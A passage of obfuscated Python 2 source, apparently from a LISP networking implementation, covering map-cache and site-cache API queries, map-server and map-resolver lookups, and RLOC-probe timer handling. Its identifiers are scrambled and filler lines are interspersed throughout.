Ooo00O00o000 = rloc . last_rloc_probe_reply
if ( Ooo00O00o000 ) :
O0OOOO0o0O [ "last-rloc-probe-reply" ] = lisp_print_elapsed ( Ooo00O00o000 )
O0OOOO0o0O [ "rloc-probe-rtt" ] = str ( rloc . rloc_probe_rtt )
if 66 - 66: iIii1I11I1II1
O0OOOO0o0O [ "rloc-hop-count" ] = rloc . rloc_probe_hops
O0OOOO0o0O [ "recent-rloc-hop-counts" ] = rloc . recent_rloc_probe_hops
if 91 - 91: oO0o
O0OOOO0o0O [ "rloc-probe-latency" ] = rloc . rloc_probe_latency
O0OOOO0o0O [ "recent-rloc-probe-latencies" ] = rloc . recent_rloc_probe_latencies
if 28 - 28: O0 - o0oOOo0O0Ooo / I1Ii111 . OoooooooOO % iII111i + II111iiii
Ii1111i1iI1 = [ ]
for oo0000OoO in rloc . recent_rloc_probe_rtts : Ii1111i1iI1 . append ( str ( oo0000OoO ) )
O0OOOO0o0O [ "recent-rloc-probe-rtts" ] = Ii1111i1iI1
return ( O0OOOO0o0O )
if 75 - 75: iII111i + i1IIi . I1IiiI / oO0o * II111iiii * i1IIi
if 14 - 14: Ii1I - I11i / i1IIi * OoOoOO00 * ooOoO0o
if 78 - 78: iII111i % I1ii11iIi11i . I11i
if 58 - 58: OoooooooOO * I1Ii111 % OoO0O00
if 75 - 75: I11i - OOooOOo
if 88 - 88: Ii1I / i11iIiiIii
if 89 - 89: ooOoO0o
def lisp_process_api_map_cache_entry ( parms ) :
o0OoO0000o = parms [ "instance-id" ]
o0OoO0000o = 0 if ( o0OoO0000o == "" ) else int ( o0OoO0000o )
if 83 - 83: I11i . I11i * OOooOOo - OOooOOo
if 46 - 46: iIii1I11I1II1 . I1Ii111 % I1IiiI
if 22 - 22: i1IIi * I11i + II111iiii + II111iiii
if 20 - 20: I11i
ooOOoo0 = lisp_address ( LISP_AFI_NONE , "" , 0 , o0OoO0000o )
ooOOoo0 . store_prefix ( parms [ "eid-prefix" ] )
oo0OoO = ooOOoo0
i1IIi1ii1i1ii = ooOOoo0
if 37 - 37: I1Ii111
if 19 - 19: I1ii11iIi11i / OOooOOo . I1IiiI / ooOoO0o + OoO0O00 + i11iIiiIii
if 80 - 80: OoO0O00 . O0 / Ii1I % I1Ii111 / iII111i * I1IiiI
if 41 - 41: O0 / OoooooooOO - i1IIi
if 6 - 6: i1IIi - I1ii11iIi11i % I1Ii111 - II111iiii / ooOoO0o / i11iIiiIii
IIi1iiIII11 = lisp_address ( LISP_AFI_NONE , "" , 0 , o0OoO0000o )
if ( parms . has_key ( "group-prefix" ) ) :
IIi1iiIII11 . store_prefix ( parms [ "group-prefix" ] )
oo0OoO = IIi1iiIII11
if 32 - 32: oO0o / IiII - I11i . ooOoO0o
if 69 - 69: i11iIiiIii * i11iIiiIii
i1I = [ ]
o0o000Oo = lisp_map_cache_lookup ( i1IIi1ii1i1ii , oo0OoO )
if ( o0o000Oo ) : I111I1iiIi1 , i1I = lisp_process_api_map_cache ( o0o000Oo , i1I )
return ( i1I )
if 100 - 100: I1ii11iIi11i * I1ii11iIi11i + i1IIi
if 96 - 96: I1Ii111 / I1IiiI + ooOoO0o
if 16 - 16: I1ii11iIi11i % o0oOOo0O0Ooo % OOooOOo % OoOoOO00 + ooOoO0o % I1ii11iIi11i
if 85 - 85: oO0o * OoooooooOO * iIii1I11I1II1 + iII111i
if 67 - 67: Ii1I / i11iIiiIii % OoOoOO00 % O0 / OoOoOO00
if 54 - 54: I11i . OoOoOO00 / II111iiii . i1IIi + OOooOOo % II111iiii
if 82 - 82: i11iIiiIii . OoooooooOO % OoOoOO00 * O0 - I1Ii111
def lisp_process_api_site_cache ( se , data ) :
if 78 - 78: OoOoOO00 % Ii1I % OOooOOo % Oo0Ooo % I11i . Ii1I
if 73 - 73: OoooooooOO / i1IIi . iIii1I11I1II1
if 89 - 89: I1Ii111
if 29 - 29: I11i * ooOoO0o - OoooooooOO
if ( se . group . is_null ( ) ) : return ( lisp_gather_site_cache_data ( se , data ) )
if 92 - 92: O0 % i1IIi / OOooOOo - oO0o
if ( se . source_cache == None ) : return ( [ True , data ] )
if 83 - 83: o0oOOo0O0Ooo . OoO0O00 % iIii1I11I1II1 % OoOoOO00 - i11iIiiIii
if 71 - 71: I1ii11iIi11i - II111iiii / O0 % i1IIi + oO0o
if 73 - 73: OoooooooOO
if 25 - 25: i1IIi . II111iiii . I1Ii111
if 81 - 81: II111iiii + OoOoOO00 * II111iiii / iIii1I11I1II1 - Oo0Ooo % oO0o
data = se . source_cache . walk_cache ( lisp_gather_site_cache_data , data )
return ( [ True , data ] )
if 66 - 66: ooOoO0o % O0 + iIii1I11I1II1 * I1Ii111 - I1Ii111
if 61 - 61: I1ii11iIi11i
if 12 - 12: OoO0O00
if 97 - 97: OOooOOo . Oo0Ooo . oO0o * i1IIi
if 7 - 7: Oo0Ooo
if 38 - 38: Oo0Ooo - I1ii11iIi11i
if 19 - 19: Ii1I * OoO0O00 / OoO0O00 . II111iiii % iIii1I11I1II1
def lisp_process_api_ms_or_mr ( ms_or_mr , data ) :
ii1i1II11II1i = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
iiIiII = data [ "dns-name" ] if data . has_key ( "dns-name" ) else None
if ( data . has_key ( "address" ) ) :
ii1i1II11II1i . store_address ( data [ "address" ] )
if 61 - 61: I1ii11iIi11i * oO0o % iII111i + IiII + i11iIiiIii * I11i
if 3 - 3: Ii1I
i11II = { }
if ( ms_or_mr ) :
for ii1iOo in lisp_map_servers_list . values ( ) :
if ( iiIiII ) :
if ( iiIiII != ii1iOo . dns_name ) : continue
else :
if ( ii1i1II11II1i . is_exact_match ( ii1iOo . map_server ) == False ) : continue
if 71 - 71: iIii1I11I1II1 . OOooOOo / I11i / i1IIi
if 69 - 69: i1IIi / iII111i + Ii1I + I11i + IiII
i11II [ "dns-name" ] = ii1iOo . dns_name
i11II [ "address" ] = ii1iOo . map_server . print_address_no_iid ( )
i11II [ "ms-name" ] = "" if ii1iOo . ms_name == None else ii1iOo . ms_name
return ( [ i11II ] )
if 86 - 86: Oo0Ooo
else :
for I1I1iiii111II in lisp_map_resolvers_list . values ( ) :
if ( iiIiII ) :
if ( iiIiII != I1I1iiii111II . dns_name ) : continue
else :
if ( ii1i1II11II1i . is_exact_match ( I1I1iiii111II . map_resolver ) == False ) : continue
if 97 - 97: I1IiiI
if 91 - 91: ooOoO0o / oO0o * OOooOOo . II111iiii - I11i - I11i
i11II [ "dns-name" ] = I1I1iiii111II . dns_name
i11II [ "address" ] = I1I1iiii111II . map_resolver . print_address_no_iid ( )
i11II [ "mr-name" ] = "" if I1I1iiii111II . mr_name == None else I1I1iiii111II . mr_name
return ( [ i11II ] )
if 5 - 5: O0 + OoooooooOO + i11iIiiIii * Oo0Ooo * OoOoOO00 . oO0o
if 6 - 6: OoO0O00 % Oo0Ooo % I1IiiI % o0oOOo0O0Ooo % O0 % Oo0Ooo
return ( [ ] )
if 94 - 94: I11i . i1IIi / II111iiii + OOooOOo
if 64 - 64: I1IiiI % ooOoO0o
if 72 - 72: O0 * II111iiii % OoO0O00 - I1IiiI * OOooOOo
if 80 - 80: OOooOOo * I11i / OOooOOo - oO0o
if 18 - 18: i1IIi - OOooOOo - o0oOOo0O0Ooo - iIii1I11I1II1
if 72 - 72: OoooooooOO % I1IiiI . OoO0O00
if 28 - 28: II111iiii / iIii1I11I1II1 / iII111i - o0oOOo0O0Ooo . I1IiiI / O0
if 16 - 16: ooOoO0o * oO0o . OoooooooOO
def lisp_process_api_database_mapping ( ) :
i1I = [ ]
if 44 - 44: iIii1I11I1II1 * OOooOOo + OoO0O00 - OoooooooOO
for ooOOo0ooo in lisp_db_list :
i1ii1i1Ii11 = { }
i1ii1i1Ii11 [ "eid-prefix" ] = ooOOo0ooo . eid . print_prefix ( )
if ( ooOOo0ooo . group . is_null ( ) == False ) :
i1ii1i1Ii11 [ "group-prefix" ] = ooOOo0ooo . group . print_prefix ( )
if 13 - 13: Oo0Ooo . I11i . II111iiii
if 6 - 6: OOooOOo . IiII / OoO0O00 * oO0o - I1Ii111 . OoOoOO00
ooOOo = [ ]
for O0OOOO0o0O in ooOOo0ooo . rloc_set :
I1IIiIIIii = { }
if ( O0OOOO0o0O . rloc . is_null ( ) == False ) :
I1IIiIIIii [ "rloc" ] = O0OOOO0o0O . rloc . print_address_no_iid ( )
if 85 - 85: i11iIiiIii + OoOoOO00
if ( O0OOOO0o0O . rloc_name != None ) : I1IIiIIIii [ "rloc-name" ] = O0OOOO0o0O . rloc_name
if ( O0OOOO0o0O . interface != None ) : I1IIiIIIii [ "interface" ] = O0OOOO0o0O . interface
II1i1III = O0OOOO0o0O . translated_rloc
if ( II1i1III . is_null ( ) == False ) :
I1IIiIIIii [ "translated-rloc" ] = II1i1III . print_address_no_iid ( )
if 27 - 27: OOooOOo
if ( I1IIiIIIii != { } ) : ooOOo . append ( I1IIiIIIii )
if 80 - 80: oO0o
if 12 - 12: iII111i / iIii1I11I1II1
if 48 - 48: oO0o - oO0o % I1Ii111 % OoO0O00 . Oo0Ooo . oO0o
if 23 - 23: I11i / IiII * II111iiii * oO0o . OoooooooOO / i1IIi
if 89 - 89: iII111i * oO0o . iIii1I11I1II1
i1ii1i1Ii11 [ "rlocs" ] = ooOOo
if 50 - 50: iIii1I11I1II1 * iIii1I11I1II1
if 20 - 20: OoOoOO00
if 86 - 86: OoooooooOO - iIii1I11I1II1 . OoO0O00 * Ii1I / I1Ii111 + I1Ii111
if 52 - 52: iIii1I11I1II1 % OoO0O00 - IiII % i11iIiiIii - o0oOOo0O0Ooo
i1I . append ( i1ii1i1Ii11 )
if 25 - 25: Oo0Ooo - OOooOOo . i1IIi * OoOoOO00 / I11i / o0oOOo0O0Ooo
return ( i1I )
if 54 - 54: OoOoOO00 / i1IIi + OOooOOo - I1ii11iIi11i - I1IiiI * I1Ii111
if 91 - 91: OoooooooOO * OoooooooOO
if 27 - 27: ooOoO0o / I1IiiI * I1ii11iIi11i . o0oOOo0O0Ooo
if 30 - 30: o0oOOo0O0Ooo / i11iIiiIii
if 33 - 33: OOooOOo % OoooooooOO
if 98 - 98: Ii1I
if 38 - 38: ooOoO0o - iII111i * OOooOOo % I1ii11iIi11i + Oo0Ooo
def lisp_gather_site_cache_data ( se , data ) :
i1ii1i1Ii11 = { }
i1ii1i1Ii11 [ "site-name" ] = se . site . site_name
i1ii1i1Ii11 [ "instance-id" ] = str ( se . eid . instance_id )
i1ii1i1Ii11 [ "eid-prefix" ] = se . eid . print_prefix_no_iid ( )
if ( se . group . is_null ( ) == False ) :
i1ii1i1Ii11 [ "group-prefix" ] = se . group . print_prefix_no_iid ( )
if 95 - 95: iIii1I11I1II1 / O0 % O0
i1ii1i1Ii11 [ "registered" ] = "yes" if se . registered else "no"
i1ii1i1Ii11 [ "first-registered" ] = lisp_print_elapsed ( se . first_registered )
i1ii1i1Ii11 [ "last-registered" ] = lisp_print_elapsed ( se . last_registered )
if 53 - 53: ooOoO0o . ooOoO0o
IiiIIi1 = se . last_registerer
IiiIIi1 = "none" if IiiIIi1 . is_null ( ) else IiiIIi1 . print_address ( )
i1ii1i1Ii11 [ "last-registerer" ] = IiiIIi1
i1ii1i1Ii11 [ "ams" ] = "yes" if ( se . accept_more_specifics ) else "no"
i1ii1i1Ii11 [ "dynamic" ] = "yes" if ( se . dynamic ) else "no"
i1ii1i1Ii11 [ "site-id" ] = str ( se . site_id )
if ( se . xtr_id_present ) :
i1ii1i1Ii11 [ "xtr-id" ] = "0x" + lisp_hex_string ( se . xtr_id )
if 80 - 80: i11iIiiIii % I1Ii111 % I1IiiI / I1IiiI + oO0o + iII111i
if 18 - 18: OoO0O00 * ooOoO0o
if 32 - 32: oO0o . OoooooooOO - o0oOOo0O0Ooo + II111iiii
if 4 - 4: OOooOOo * I1IiiI - I11i - I11i
if 67 - 67: I1IiiI
OoO0oOOooOO = [ ]
for I1IIiIIIii in se . registered_rlocs :
O0OOOO0o0O = { }
O0OOOO0o0O [ "address" ] = I1IIiIIIii . rloc . print_address_no_iid ( ) if I1IIiIIIii . rloc_exists ( ) else "none"
if 32 - 32: oO0o * i11iIiiIii - I11i % Oo0Ooo * I1ii11iIi11i
if 79 - 79: II111iiii / Oo0Ooo / I1ii11iIi11i
if ( I1IIiIIIii . geo ) : O0OOOO0o0O [ "geo" ] = I1IIiIIIii . geo . print_geo ( )
if ( I1IIiIIIii . elp ) : O0OOOO0o0O [ "elp" ] = I1IIiIIIii . elp . print_elp ( False )
if ( I1IIiIIIii . rle ) : O0OOOO0o0O [ "rle" ] = I1IIiIIIii . rle . print_rle ( False , True )
if ( I1IIiIIIii . json ) : O0OOOO0o0O [ "json" ] = I1IIiIIIii . json . print_json ( False )
if ( I1IIiIIIii . rloc_name ) : O0OOOO0o0O [ "rloc-name" ] = I1IIiIIIii . rloc_name
O0OOOO0o0O [ "uptime" ] = lisp_print_elapsed ( I1IIiIIIii . uptime )
O0OOOO0o0O [ "upriority" ] = str ( I1IIiIIIii . priority )
O0OOOO0o0O [ "uweight" ] = str ( I1IIiIIIii . weight )
O0OOOO0o0O [ "mpriority" ] = str ( I1IIiIIIii . mpriority )
O0OOOO0o0O [ "mweight" ] = str ( I1IIiIIIii . mweight )
if 30 - 30: I11i . o0oOOo0O0Ooo / II111iiii
OoO0oOOooOO . append ( O0OOOO0o0O )
if 59 - 59: i11iIiiIii
i1ii1i1Ii11 [ "registered-rlocs" ] = OoO0oOOooOO
if 5 - 5: i11iIiiIii + o0oOOo0O0Ooo . OoO0O00 % OoOoOO00 + I11i
data . append ( i1ii1i1Ii11 )
return ( [ True , data ] )
if 59 - 59: I1ii11iIi11i
if 47 - 47: I1IiiI + Oo0Ooo
if 78 - 78: i1IIi / I1ii11iIi11i % ooOoO0o * OoO0O00
if 10 - 10: i1IIi % ooOoO0o / iII111i
if 98 - 98: IiII / o0oOOo0O0Ooo - i1IIi - OOooOOo
if 65 - 65: Ii1I + OoOoOO00 * Oo0Ooo . O0 . IiII
if 33 - 33: i11iIiiIii . i1IIi . I1Ii111 - OoOoOO00 + OOooOOo
def lisp_process_api_site_cache_entry ( parms ) :
o0OoO0000o = parms [ "instance-id" ]
o0OoO0000o = 0 if ( o0OoO0000o == "" ) else int ( o0OoO0000o )
if 34 - 34: I1ii11iIi11i . i1IIi * O0 / OoooooooOO
if 22 - 22: OOooOOo % o0oOOo0O0Ooo - i11iIiiIii
if 58 - 58: IiII . Ii1I + II111iiii
if 31 - 31: i11iIiiIii + i11iIiiIii + I11i * Oo0Ooo . I11i
ooOOoo0 = lisp_address ( LISP_AFI_NONE , "" , 0 , o0OoO0000o )
ooOOoo0 . store_prefix ( parms [ "eid-prefix" ] )
if 28 - 28: OOooOOo * iIii1I11I1II1 * OoOoOO00
if 75 - 75: Oo0Ooo % IiII + II111iiii + oO0o
if 35 - 35: I1ii11iIi11i - oO0o - O0 / iII111i % IiII
if 10 - 10: OOooOOo + oO0o - I1Ii111 . I1IiiI
if 11 - 11: I1ii11iIi11i . I1Ii111 / o0oOOo0O0Ooo + IiII
IIi1iiIII11 = lisp_address ( LISP_AFI_NONE , "" , 0 , o0OoO0000o )
if ( parms . has_key ( "group-prefix" ) ) :
IIi1iiIII11 . store_prefix ( parms [ "group-prefix" ] )
if 73 - 73: OoO0O00 . i11iIiiIii * OoO0O00 * i1IIi + I11i
if 27 - 27: i11iIiiIii / OoOoOO00 % O0 / II111iiii . I11i - ooOoO0o
i1I = [ ]
iIiIi1I = lisp_site_eid_lookup ( ooOOoo0 , IIi1iiIII11 , False )
if ( iIiIi1I ) : lisp_gather_site_cache_data ( iIiIi1I , i1I )
return ( i1I )
if 54 - 54: oO0o * II111iiii
if 79 - 79: o0oOOo0O0Ooo . ooOoO0o . Oo0Ooo * OoooooooOO
if 98 - 98: ooOoO0o
if 73 - 73: I1Ii111
if 97 - 97: OoO0O00 * Ii1I + Oo0Ooo
if 83 - 83: II111iiii - Oo0Ooo % II111iiii * o0oOOo0O0Ooo
if 51 - 51: iII111i * iIii1I11I1II1 % Ii1I * Ii1I + i11iIiiIii . OoooooooOO
def lisp_get_interface_instance_id ( device , source_eid ) :
II1i = None
if ( lisp_myinterfaces . has_key ( device ) ) :
II1i = lisp_myinterfaces [ device ]
if 54 - 54: i11iIiiIii . iIii1I11I1II1 * iIii1I11I1II1 + Ii1I % I11i - OoO0O00
if 16 - 16: IiII % iIii1I11I1II1 * i11iIiiIii + O0
if 76 - 76: iII111i * OOooOOo
if 7 - 7: ooOoO0o + o0oOOo0O0Ooo + o0oOOo0O0Ooo
if 73 - 73: IiII % I11i % i11iIiiIii + ooOoO0o
if 83 - 83: Ii1I * I1Ii111 * i11iIiiIii / iIii1I11I1II1 % I1ii11iIi11i
if ( II1i == None or II1i . instance_id == None ) :
return ( lisp_default_iid )
if 40 - 40: iII111i
if 21 - 21: I1Ii111 / iII111i + Oo0Ooo / I1ii11iIi11i / I1Ii111
if 33 - 33: OoooooooOO
if 59 - 59: i11iIiiIii - OoooooooOO . ooOoO0o / i11iIiiIii % iIii1I11I1II1 * I1ii11iIi11i
if 45 - 45: I1ii11iIi11i * I1ii11iIi11i
if 31 - 31: OoO0O00 - OOooOOo . iII111i * I1Ii111 * iII111i + I1ii11iIi11i
if 5 - 5: Oo0Ooo . I1Ii111
if 77 - 77: i11iIiiIii / I1Ii111 / I1ii11iIi11i % oO0o
if 83 - 83: Ii1I % iIii1I11I1II1 / I1ii11iIi11i + I11i
o0OoO0000o = II1i . get_instance_id ( )
if ( source_eid == None ) : return ( o0OoO0000o )
if 23 - 23: iIii1I11I1II1 - I1IiiI
Ooo0II1IiI1i = source_eid . instance_id
oOOO000 = None
for II1i in lisp_multi_tenant_interfaces :
if ( II1i . device != device ) : continue
IIII1 = II1i . multi_tenant_eid
source_eid . instance_id = IIII1 . instance_id
if ( source_eid . is_more_specific ( IIII1 ) == False ) : continue
if ( oOOO000 == None or oOOO000 . multi_tenant_eid . mask_len < IIII1 . mask_len ) :
oOOO000 = II1i
if 43 - 43: IiII
if 20 - 20: OoOoOO00
source_eid . instance_id = Ooo0II1IiI1i
if 33 - 33: OoO0O00
if ( oOOO000 == None ) : return ( o0OoO0000o )
return ( oOOO000 . get_instance_id ( ) )
if 55 - 55: ooOoO0o + ooOoO0o
if 93 - 93: oO0o - I1IiiI / I1ii11iIi11i % o0oOOo0O0Ooo / OoooooooOO + II111iiii
if 10 - 10: o0oOOo0O0Ooo - iII111i . O0 + OoO0O00 - Oo0Ooo - i11iIiiIii
if 37 - 37: iIii1I11I1II1
if 37 - 37: II111iiii % OoOoOO00 . IiII * ooOoO0o . I1IiiI
if 25 - 25: OoooooooOO % i1IIi . I1Ii111 / OoOoOO00 - I1ii11iIi11i
if 15 - 15: iIii1I11I1II1
if 72 - 72: OoO0O00 . IiII * Ii1I - I1IiiI
if 81 - 81: oO0o . OOooOOo - Ii1I . OoOoOO00
def lisp_allow_dynamic_eid ( device , eid ) :
if ( lisp_myinterfaces . has_key ( device ) == False ) : return ( None )
if 100 - 100: Ii1I * i1IIi * i1IIi - iII111i + OoO0O00 + OoO0O00
II1i = lisp_myinterfaces [ device ]
iIiII = device if II1i . dynamic_eid_device == None else II1i . dynamic_eid_device
if 24 - 24: IiII * i11iIiiIii % o0oOOo0O0Ooo - ooOoO0o + ooOoO0o . II111iiii
if 69 - 69: I1IiiI . i11iIiiIii - o0oOOo0O0Ooo
if ( II1i . does_dynamic_eid_match ( eid ) ) : return ( iIiII )
return ( None )
if 40 - 40: OOooOOo * Ii1I
if 38 - 38: ooOoO0o
if 5 - 5: OoooooooOO + iII111i - I11i
if 95 - 95: OOooOOo / i11iIiiIii - Ii1I + I1ii11iIi11i
if 7 - 7: I1ii11iIi11i
if 37 - 37: O0 . II111iiii
if 70 - 70: o0oOOo0O0Ooo / iII111i + i1IIi + I11i % iIii1I11I1II1 % Oo0Ooo
def lisp_start_rloc_probe_timer ( interval , lisp_sockets ) :
global lisp_rloc_probe_timer
if 1 - 1: O0 + OoO0O00 . i11iIiiIii + I1Ii111 - OoO0O00 - IiII
if ( lisp_rloc_probe_timer != None ) : lisp_rloc_probe_timer . cancel ( )
if 1 - 1: I1ii11iIi11i / i1IIi . I1IiiI / Ii1I
IiiII = lisp_process_rloc_probe_timer
iiI1IOO00o0Oo0000 = threading . Timer ( interval , IiiII , [ lisp_sockets ] )
lisp_rloc_probe_timer = iiI1IOO00o0Oo0000
iiI1IOO00o0Oo0000 . start ( )
return
if 10 - 10: OoOoOO00 % I1ii11iIi11i * O0
if 20 - 20: ooOoO0o + I1IiiI - IiII % ooOoO0o - IiII . oO0o
if 39 - 39: O0 / oO0o % oO0o * iIii1I11I1II1
if 7 - 7: iII111i % o0oOOo0O0Ooo / II111iiii % IiII / iIii1I11I1II1
if 17 - 17: I11i * I11i - O0 / IiII + OoOoOO00
if 65 - 65: I1Ii111 * i1IIi
if 10 - 10: OOooOOo % IiII
def lisp_show_rloc_probe_list ( ) :
lprint ( bold ( "----- RLOC-probe-list -----" , False ) )
for Oo000O000 in lisp_rloc_probe_list :
I11iiI1i11I1Ii = lisp_rloc_probe_list [ Oo000O000 ]
lprint ( "RLOC {}:" . format ( Oo000O000 ) )
for O0OOOO0o0O , oOo , i11ii in I11iiI1i11I1Ii :
lprint ( " [{}, {}, {}, {}]" . format ( hex ( id ( O0OOOO0o0O ) ) , oOo . print_prefix ( ) ,
i11ii . print_prefix ( ) , O0OOOO0o0O . translated_port ) )
if 74 - 74: O0 % OoOoOO00 - Ii1I / I1ii11iIi11i / Oo0Ooo
if 74 - 74: i1IIi
lprint ( bold ( "---------------------------" , False ) )
return
if 38 - 38: II111iiii * i1IIi
if 43 - 43: O0 - OOooOOo / I1IiiI * II111iiii . OoooooooOO / OoOoOO00
if 77 - 77: OoOoOO00
if 10 - 10: IiII / i11iIiiIii
if 19 - 19: OoO0O00
if 100 - 100: I1ii11iIi11i - I1ii11iIi11i
if 38 - 38: I1Ii111
if 23 - 23: Ii1I . I1ii11iIi11i + I1Ii111 + i1IIi * o0oOOo0O0Ooo - i11iIiiIii
if 92 - 92: I1Ii111 - I1IiiI + Ii1I / iII111i % OOooOOo
def lisp_mark_rlocs_for_other_eids ( eid_list ) :
if 32 - 32: i1IIi . iII111i - Ii1I % iII111i % II111iiii - oO0o
if 36 - 36: OoooooooOO * OoooooooOO . ooOoO0o . O0
if 5 - 5: I11i % I1IiiI - OoO0O00 . Oo0Ooo
if 79 - 79: iII111i + IiII % I11i . Oo0Ooo / IiII * iII111i
I1IIiIIIii , oOo , i11ii = eid_list [ 0 ]
i1IiIiII1 = [ lisp_print_eid_tuple ( oOo , i11ii ) ]
if 18 - 18: II111iiii * oO0o
for I1IIiIIIii , oOo , i11ii in eid_list [ 1 : : ] :
I1IIiIIIii . state = LISP_RLOC_UNREACH_STATE
I1IIiIIIii . last_state_change = lisp_get_timestamp ( )
i1IiIiII1 . append ( lisp_print_eid_tuple ( oOo , i11ii ) )
if 55 - 55: I1ii11iIi11i * i11iIiiIii + Oo0Ooo
if 29 - 29: I1ii11iIi11i / IiII . I1Ii111 + Ii1I + OoO0O00
o00 = bold ( "unreachable" , False )
o0oooOoOoOo = red ( I1IIiIIIii . rloc . print_address_no_iid ( ) , False )
if 72 - 72: oO0o - II111iiii / I1IiiI
for ooOOoo0 in i1IiIiII1 :
oOo = green ( ooOOoo0 , False )
lprint ( "RLOC {} went {} for EID {}" . format ( o0oooOoOoOo , o00 , oOo ) )
if 47 - 47: oO0o * I1Ii111 - O0 % iII111i * iIii1I11I1II1 / I1IiiI
if 72 - 72: ooOoO0o / ooOoO0o * iIii1I11I1II1 . II111iiii * OOooOOo - iIii1I11I1II1
if 15 - 15: Oo0Ooo - i11iIiiIii * OoO0O00 + I1ii11iIi11i + I1ii11iIi11i
if 74 - 74: ooOoO0o
if 7 - 7: Oo0Ooo / ooOoO0o + o0oOOo0O0Ooo
if 38 - 38: o0oOOo0O0Ooo . O0 - OoO0O00 % I11i
for I1IIiIIIii , oOo , i11ii in eid_list :
o0o000Oo = lisp_map_cache . lookup_cache ( oOo , True )
if ( o0o000Oo ) : lisp_write_ipc_map_cache ( True , o0o000Oo )
if 80 - 80: o0oOOo0O0Ooo
return
if 100 - 100: iIii1I11I1II1 . OoOoOO00 . OoooooooOO / I1ii11iIi11i - I1IiiI * I11i
if 5 - 5: i1IIi * o0oOOo0O0Ooo - I1Ii111 + I1IiiI - II111iiii
if 15 - 15: I1Ii111
if 38 - 38: O0
if 50 - 50: i11iIiiIii * OoO0O00 + iII111i / O0 * oO0o % ooOoO0o
if 6 - 6: OoO0O00 . o0oOOo0O0Ooo / Ii1I + Ii1I
if 59 - 59: II111iiii - o0oOOo0O0Ooo * OoooooooOO
if 83 - 83: oO0o . iIii1I11I1II1 . iII111i % Oo0Ooo
if 48 - 48: oO0o % OoO0O00 - OoooooooOO . IiII
if 11 - 11: I1Ii111 % o0oOOo0O0Ooo - o0oOOo0O0Ooo % OoooooooOO . o0oOOo0O0Ooo - I1ii11iIi11i
def lisp_process_rloc_probe_timer ( lisp_sockets ) :
lisp_set_exception ( )
if 33 - 33: OoO0O00 + II111iiii . Oo0Ooo * I1Ii111
lisp_start_rloc_probe_timer ( LISP_RLOC_PROBE_INTERVAL , lisp_sockets )
if ( lisp_rloc_probing == False ) : return
if 63 - 63: OoooooooOO + OoOoOO00 - OoooooooOO
if 54 - 54: OoO0O00 + I1IiiI % O0 + OoO0O00
if 37 - 37: II111iiii / I1ii11iIi11i * I1IiiI - OoooooooOO
if 55 - 55: IiII / ooOoO0o * I1IiiI / I1Ii111 - Oo0Ooo % o0oOOo0O0Ooo
if ( lisp_print_rloc_probe_list ) : lisp_show_rloc_probe_list ( )
if 82 - 82: OoO0O00 - iIii1I11I1II1 . Oo0Ooo / IiII . OoO0O00
if 47 - 47: OOooOOo + IiII
if 11 - 11: Oo0Ooo + I1IiiI % i11iIiiIii % Oo0Ooo + ooOoO0o + i1IIi
if 100 - 100: II111iiii - OOooOOo + iII111i - i11iIiiIii . O0 / iII111i
oooO00OoO0O = lisp_get_default_route_next_hops ( )
if 9 - 9: o0oOOo0O0Ooo / ooOoO0o + iII111i / II111iiii * Oo0Ooo
lprint ( "---------- Start RLOC Probing for {} entries ----------" . format ( len ( lisp_rloc_probe_list ) ) )
if 93 - 93: O0 % ooOoO0o
if 48 - 48: i1IIi + iII111i - Ii1I
if 9 - 9: o0oOOo0O0Ooo
if 92 - 92: i11iIiiIii + OoooooooOO + O0 % oO0o
if 90 - 90: Oo0Ooo * i11iIiiIii
I1I1 = 0
oO0oo000O = bold ( "RLOC-probe" , False )
for O0ooooooOo0 in lisp_rloc_probe_list . values ( ) :
if 69 - 69: iIii1I11I1II1 * oO0o
if 80 - 80: IiII - oO0o % Ii1I - iIii1I11I1II1 . OoO0O00
if 64 - 64: I1IiiI % i11iIiiIii / oO0o
if 78 - 78: II111iiii - Oo0Ooo . iIii1I11I1II1 - ooOoO0o . oO0o
if 84 - 84: iII111i . ooOoO0o * I1IiiI * Oo0Ooo / I1Ii111
Oo0o0O0ooO0o = None
for iiI1I1Ii , ooOOoo0 , IIi1iiIII11 in O0ooooooOo0 :
oo0o00OO = iiI1I1Ii . rloc . print_address_no_iid ( )
if 65 - 65: OoO0O00 % OoOoOO00 % I1ii11iIi11i / OoooooooOO
if 85 - 85: O0 * OOooOOo % I1Ii111
if 33 - 33: O0
if 30 - 30: II111iiii . O0 . oO0o * I1ii11iIi11i + oO0o . o0oOOo0O0Ooo
o0O0o0O , i1IoO , IIIi1i1iIIIi = lisp_allow_gleaning ( ooOOoo0 , None , iiI1I1Ii )
if ( o0O0o0O and i1IoO == False ) :
oOo = green ( ooOOoo0 . print_address ( ) , False )
oo0o00OO += ":{}" . format ( iiI1I1Ii . translated_port )
lprint ( "Suppress probe to RLOC {} for gleaned EID {}" . format ( red ( oo0o00OO , False ) , oOo ) )
if 10 - 10: oO0o
continue
if 75 - 75: II111iiii % OOooOOo / iIii1I11I1II1 / OoO0O00 + oO0o
if 16 - 16: oO0o + I1Ii111 - II111iiii - o0oOOo0O0Ooo / i11iIiiIii
if 59 - 59: OOooOOo - o0oOOo0O0Ooo
if 82 - 82: IiII % ooOoO0o - OoO0O00 % ooOoO0o
if 51 - 51: ooOoO0o % iII111i . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 20 - 20: i1IIi - ooOoO0o % OoooooooOO * I1ii11iIi11i + II111iiii % i1IIi
if 30 - 30: i11iIiiIii - I1IiiI + o0oOOo0O0Ooo + IiII
if ( iiI1I1Ii . down_state ( ) ) : continue
if 16 - 16: I1ii11iIi11i / Ii1I + I1ii11iIi11i * I1Ii111
if 49 - 49: ooOoO0o * OoOoOO00 . OoooooooOO . ooOoO0o + Oo0Ooo * IiII
if 47 - 47: iII111i . i1IIi . I1ii11iIi11i / OoooooooOO
if 84 - 84: o0oOOo0O0Ooo * I11i
if 22 - 22: i1IIi + OOooOOo % OoooooooOO
if 34 - 34: oO0o / O0 - II111iiii % Oo0Ooo + I11i
if 23 - 23: o0oOOo0O0Ooo + i11iIiiIii . I1IiiI + iIii1I11I1II1
if 18 - 18: o0oOOo0O0Ooo . O0 + I1Ii111
if 66 - 66: OoooooooOO
if 90 - 90: IiII - OoOoOO00
if 98 - 98: Oo0Ooo / oO0o . Ii1I
if ( Oo0o0O0ooO0o ) :
iiI1I1Ii . last_rloc_probe_nonce = Oo0o0O0ooO0o . last_rloc_probe_nonce
if 56 - 56: ooOoO0o % OoO0O00 * i11iIiiIii % IiII % I1IiiI - oO0o
